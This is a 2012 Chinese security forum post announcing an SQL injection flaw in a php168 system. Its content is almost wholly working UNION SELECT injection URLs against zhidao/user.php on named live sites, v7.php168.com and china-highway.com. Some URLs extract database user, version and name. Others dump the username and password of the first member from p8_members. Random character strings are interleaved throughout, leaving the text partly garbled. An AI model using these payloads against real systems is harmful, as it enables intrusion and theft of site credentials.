找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3052|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
* j6 t/ R, z. A" z9 c+ f+ [3 y                                                         ; Q0 ^4 `& @) k4 J* c# B3 ]7 {
                                       + K; X- J* Y* ^  J! I. Z

; ^- _0 Q3 v" R6 R; i& k: }
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--4 u. f) ^# J7 z. }3 ]+ M" q
                                                     
$ K" b$ e& W" t/ F7 k                                                                  
# ]% `( d0 _% B* C9 h                                                          ?' J3 u- P5 m1 j: V: I9 a7 _0 p! N+ r
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--9 i/ }( F  l( N" @

: A6 F5 l1 _( j
2 l% g  q1 u8 ?. o2 ?+ E9 e  l9 z3 X2 J8 X
                                                            
7 K/ f  p. U/ Y9 a% p- P 9 Y* t( ]- b  J' m
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
4 J- B2 K: y( t8 ?3 \% ^( t* A4 N4 e- p  b2 ^+ a7 l
; R. V% v5 `% \/ F9 A& F

0 F5 S. q, i: m& W  H                                                                    
3 z7 j( B, |" o8 J& E1 |/ N

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表